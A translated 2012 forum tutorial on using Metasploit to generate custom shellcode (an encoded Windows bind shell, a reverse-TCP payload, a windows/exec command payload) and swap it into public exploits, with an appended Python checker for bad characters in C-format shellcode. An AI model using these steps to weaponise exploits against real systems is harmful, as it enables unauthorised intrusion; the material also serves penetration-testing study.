18 METASPLOIT and SHELLCODE
Posted on 2012-8-6 15:50:46

What is SHELLCODE? See here: http://baike.baidu.com/view/940274.htm

SHELLCODE is the backdoor of an overflow program. For example, this one written by TrOoN of 九区: http://www.1337day.com/exploits/17707
What it does is shut the machine down.

When we use certain EXPs, the SHELLCODE bundled with the overflow program does not meet our needs. Look at this one written by my friend KedAns-Dz:

http://www.1337day.com/exploits/17432

Look at his SHELLCODE:
$shell = # win/shell_reverse_tcp | enc=alphaMiX | by : MSF

A TCP reverse-connect backdoor. If the one in some EXP only pops up Notepad, how do we generate the SHELLCODE we actually want?
First you need to be familiar with http://helen.dis9.com/?p=8 (METASPLOIT PAYLOADs).
Let's generate one (open UB 1). Generate a BIND SHELL:

  root@Dis9Team:~# msfpayload windows/shell/bind_tcp R | ./msfencode -e x86/alpha_mixed
  [*] x86/alpha_mixed succeeded with size 659 (iteration=1)

-e x86/alpha_mixed selects the encoder. Another method: let's generate a CMD command:

  msf > use windows/exec
  msf payload(exec) > show options

  Module options:

     Name      Current Setting  Required  Description
     ----      ---------------  --------  -----------
     CMD                        yes       The command string to execute
     EXITFUNC  process          yes       Exit technique: seh, thread, process, none

  msf payload(exec) > set cmd taskkill /PID 12345
  cmd => taskkill /PID 12345
  msf payload(exec) > show options

  Module options:

     Name      Current Setting      Required  Description
     ----      ---------------      --------  -----------
     CMD       taskkill /PID 12345  yes       The command string to execute
     EXITFUNC  process              yes       Exit technique: seh, thread, process, none

  msf payload(exec) > generate -h
  Usage: generate [options]

  Generates a payload.

  OPTIONS:

      -E        Force encoding.
      -b   The list of characters to avoid: '\x00\xff'
      -e   The name of the encoder module to use.
      -f   The output file name (otherwise stdout)
      -h        Help banner.
      -i   the number of encoding iterations.
      -k        Keep the template executable functional
      -o   A comma separated list of options in VAR=VAL format.
      -p   The Platform for output.
      -s   NOP sled length.
      -t   The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
      -x   The executable template to use

  msf payload(exec) > generate -t c -f /root/windows-exec-payload.c
Then replace the SHELLCODE in our EXP with it.
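As an added check (example code, not from the original post or from Metasploit), this Python script parses the C-format listing that `msfencode -t c` and `generate -t c` emit, reports the byte count to compare against msfencode's "succeeded with size N" line, flags any byte from the `-b` bad-character list, and measures how much of the blob the x86/alpha_mixed encoder actually left alphanumeric. The sample listing inside it is constructed, not the payload generated above.

```python
import re

# Constructed sample in the C format that `msfencode -t c` / `generate -t c`
# print. These are NOT the page's payload bytes: the first line imitates a
# short GetPC-style stub, the rest is ASCII filler.
SAMPLE_C_OUTPUT = r'''
unsigned char buf[] =
"\x89\xe2\xd9\xeb\xd9\x74\x24\xf4\x5b"
"\x48\x65\x6c\x6c\x6f\x41\x6c\x70\x68\x61\x4d\x69\x78\x65\x64"
"\x53\x68\x65\x6c\x6c\x42\x6f\x64\x79\x39\x39";
'''
# Same sample with one NUL spliced in, to exercise the bad-char check.
SAMPLE_WITH_NUL = SAMPLE_C_OUTPUT.replace(r"\x39\x39", r"\x00\x39")

_STR_RE = re.compile(r'"((?:\\x[0-9a-fA-F]{2})*)"')


def _is_alnum(b: int) -> bool:
    # ASCII only: chr(0xaa).isalnum() is True in Python and would hide dirty bytes
    return b < 0x80 and chr(b).isalnum()


def parse_c_shellcode(text: str) -> bytes:
    """Concatenate every quoted run of \\xHH escapes in the C listing into raw bytes."""
    hex_digits = "".join(m.group(1).replace("\\x", "") for m in _STR_RE.finditer(text))
    return bytes.fromhex(hex_digits)


def find_bad_chars(shellcode: bytes, bad: bytes = b"\x00\xff") -> dict:
    """Map each forbidden byte (the -b list) to the offsets where it occurs."""
    hits = {}
    for i, b in enumerate(shellcode):
        if b in bad:
            hits.setdefault(b, []).append(i)
    return hits


def stub_length(shellcode: bytes) -> int:
    """Offset where the purely alphanumeric region begins: x86/alpha_mixed emits a
    short non-alphanumeric GetPC stub and then only [A-Za-z0-9], so any filter on
    the target must still let these leading bytes through."""
    last_dirty = max((i for i, b in enumerate(shellcode) if not _is_alnum(b)), default=-1)
    return last_dirty + 1


def check_payload(text: str, bad: bytes = b"\x00\xff") -> dict:
    """Size (compare with msfencode's 'succeeded with size N'), bad chars, stub length."""
    sc = parse_c_shellcode(text)
    alnum = sum(1 for b in sc if _is_alnum(b))
    return {"size": len(sc), "bad_chars": find_bad_chars(sc, bad),
            "stub_len": stub_length(sc),
            "alnum_fraction": round(alnum / len(sc), 3) if sc else 0.0}
```

Run `check_payload(open("/root/windows-exec-payload.c").read())` on a real listing; a non-empty `bad_chars` means the blob needs re-encoding with `-b` before it goes into the EXP.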
